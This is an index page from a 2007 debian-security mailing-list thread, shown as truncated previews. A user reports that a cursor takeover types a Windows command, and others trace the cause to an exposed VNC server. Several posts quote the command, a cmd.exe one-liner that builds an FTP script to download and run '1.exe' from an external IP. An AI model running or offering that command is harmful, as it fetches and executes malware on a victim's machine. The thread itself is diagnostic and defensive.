Re: spooky windows script

2007-05-09 Thread Jan Outhuis
Greetings, Jan > Datum: 09/05/07 08:11 AM > Van: "Lee Braiden" <[EMAIL PROTECTED]> > Aan: debian-security@lists.debian.org > CC: > Onderwerp : Re: spooky windows script > > On Tuesday 08 May 2007 22:34:30 Gerardo Curiel wrote: > > El mar, 08-05-2007 a las

Re: spooky windows script

2007-05-09 Thread Lee Braiden
On Tuesday 08 May 2007 22:34:30 Gerardo Curiel wrote: > El mar, 08-05-2007 a las 22:24 +0200, Thomas Hochstein escribió: > > Chris Adams schrieb: > > > Do you have a VNC server installed? > > > > > | But I do have vino-server running. > > > > Yes. > > That's the problem, the same happened to me a c

Re: spooky windows script

2007-05-08 Thread Noah Meyerhans
On Tue, May 08, 2007 at 05:34:30PM -0400, Gerardo Curiel wrote: > El mar, 08-05-2007 a las 22:24 +0200, Thomas Hochstein escribi?: > > Chris Adams schrieb: > > > > > Do you have a VNC server installed? > > > > | But I do have vino-server running. > > That's the problem, the same happened to me

Re: spooky windows script

2007-05-08 Thread Gerardo Curiel
El mar, 08-05-2007 a las 22:24 +0200, Thomas Hochstein escribió: > Chris Adams schrieb: > > > Do you have a VNC server installed? > > | But I do have vino-server running. > > Yes. That's the problem, the same happened to me a couple of weeks ago, in my Desktop(a newly installed Debian Unstabl

Re: spooky windows script

2007-05-08 Thread Thomas Hochstein
Chris Adams schrieb: > Do you have a VNC server installed? | But I do have vino-server running. Yes. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: spooky windows script

2007-05-08 Thread Celejar
On Tue, 8 May 2007 18:17:08 +0200 (CEST) Jan Outhuis <[EMAIL PROTECTED]> wrote: > > > > > Well, > > > > to specify on this, I am running Debian testing, and surfing with Firefox > > 2.0. > > > > The script gets typed in any window that's active at the moment the cursor > > is being taken o

Re: spooky windows script

2007-05-08 Thread Chris Adams
On May 8, 2007, at 9:17 AM, Jan Outhuis wrote: The script gets typed in any window that's active at the moment the cursor is being taken over: it may be the Firefox 'find'-field or a terminal window for that matter. Do you have a VNC server installed? If so you really want to either remov

Re: spooky windows script

2007-05-08 Thread Jan Outhuis
Datum: 08/05/07 04:15 PM > > Van: "David Clymer" <[EMAIL PROTECTED]> > > Aan: debian-security@lists.debian.org > > CC: > > Onderwerp : Re: spooky windows script > > > > On Tue, 2007-05-08 at 14:57 +0200, Jan Outhuis wrote: > > > Hello, >

Re: spooky windows script

2007-05-08 Thread David Clymer
On Tue, 2007-05-08 at 14:57 +0200, Jan Outhuis wrote: > Hello, > > Recently I'm repeatedly being pestered by a strange event while surfing the > net. My cursor is taken over and the following code is typed: > > %systemroot%\system32\cmd.exe > cmd /c echo open 59.31.153.120 22783 >> ik &echo user

Re: spooky windows script

2007-05-08 Thread Stephan Loh
hi, > %systemroot%\system32\cmd.exe > cmd /c echo open 59.31.153.120 22783 >> ik &echo user db database >> ik &echo > get 1.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &1.exe &exit to clarify what this command line does: it writes the following text lines in a file called "ik": open 59.

Re: spooky windows script

2007-05-08 Thread andersen
If this occurred on my Windows box, I would back up what needs to be backed up and reload the OS with something useful. Your machine has clearly been compromised. -- On Tue, 8 May 2007, Celejar wrote: On Tue, 8 May 2007 14:57:24 +0200 (CEST) Jan Outhuis <[EMAIL PROTECTED]> wrote: > Hello,

Re: spooky windows script

2007-05-08 Thread Celejar
On Tue, 8 May 2007 14:57:24 +0200 (CEST) Jan Outhuis <[EMAIL PROTECTED]> wrote: > Hello, > > Recently I'm repeatedly being pestered by a strange event while surfing the > net. My cursor is taken over and the following code is typed: > > %systemroot%\system32\cmd.exe > cmd /c echo open 59.31.15

Re: spooky windows script

2007-05-08 Thread Henri Salo
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On Tue, 8 May 2007 14:57:24 +0200 (CEST) Jan Outhuis <[EMAIL PROTECTED]> wrote: > Hello, > > Recently I'm repeatedly being pestered by a strange event while > surfing the net. My cursor is taken over and the following code is > typed: > > %systemro

Re: spooky windows script

2007-05-08 Thread Dale Amon
On Tue, May 08, 2007 at 02:57:24PM +0200, Jan Outhuis wrote: > %systemroot%\system32\cmd.exe > cmd /c echo open 59.31.153.120 22783 >> ik &echo user db database >> ik &echo > get 1.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &1.exe &exit If you were running a windows system this might do s

spooky windows script

2007-05-08 Thread Jan Outhuis
Hello, Recently I'm repeatedly being pestered by a strange event while surfing the net. My cursor is taken over and the following code is typed: %systemroot%\system32\cmd.exe cmd /c echo open 59.31.153.120 22783 >> ik &echo user db database >> ik &echo get 1.exe >> ik &echo bye >> ik &ftp -n -v